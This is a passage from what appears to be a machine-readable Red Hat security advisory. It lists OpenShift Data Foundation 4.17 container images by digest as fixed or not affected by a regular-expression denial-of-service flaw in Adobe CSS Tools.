"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2250364", }, ], notes: [ { category: "description", text: "A flaw was found in Adobe CSS Tools. An improper input validation could result in a minor denial of service while parsing a malicious CSS with the parse component. User interaction and privileges are not required to jeopardize an environment.", title: "Vulnerability description", }, { category: "summary", text: "css-tools: Improper Input Validation causes Denial of Service via Regular Expression", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", ], known_not_affected: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", 